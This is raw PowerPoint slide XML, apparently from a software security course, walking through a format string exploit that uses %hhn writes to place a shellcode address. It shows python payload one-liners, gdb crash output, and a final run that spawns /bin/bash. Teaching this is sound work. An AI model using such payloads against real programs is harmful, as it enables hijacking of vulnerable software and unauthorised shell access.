            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&amp;of our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, say </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0xffffcaf5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Which is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" smtClean="0"/>
              <a:t>4,294,953,717 (4.2 GB)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>268</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11635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String Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Instead of writing 0xffffcaf5 all in one go, let's write 0xff 0xff 0xca 0xf5 separately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To the man page!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will act as a "signed char" and only write one byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We've already output 16 (0x10) bytes, so to get to 0xff we need (0xff – 0x10 = 0xef = 239)</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269</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39168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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>86 Assembly Language</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Slightly) higher-level language than machine language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Program is made of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>directives: commands for the assembler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.data identifies a section with variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>instructions: actual operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x08048f3f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Two possible syntaxes, with different ordering of the operands!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AT&amp;T syntax (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, GNU Assembler)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mnemonic source, destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOS/Intel syntax (Microsoft Assembler, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, IDA Pro)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mnemonic destination, source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can be set using: set disassembly-flavor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>intel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>att</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198875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2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2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2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2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24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24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24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24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249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249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249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24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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "\xd8\x97\x04\x08BBBBCCCCDDDD" + "%239x%2\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"'` &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...  run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="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Program received signal SIGILL, Illegal instruction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x080483</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>in _start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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 echo `python -c 'print "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x97\x04\x08BBBBCCCCDDDD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>" + "%239x%2\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"'` &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Program received signal SIGSEGV, Segmentation fault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xff0483a2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>in ?? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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 echo `python -c 'print "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x97\x04\x08\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x97\x04\x08CCCCDDDD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>" + "%239x%2\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hhn%3\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"'` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Program received signal SIGSEGV, Segmentation fault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xffffba4b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>in ?? ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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270</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102663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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>At </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xffffba4b, want </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0xffffcaf5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Need to change output from 0xff to 0xca for next byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wraparound</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need to write out 1 + 0xca = 203</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-c 'print "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x97\x04\x08\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x97\x04\x08\xd9\x97\x04\x08DDDD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>" + "%239x%2\$hhn%3\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hhn%203x%4\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"'` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>process 52731 is executing new program: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>271</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
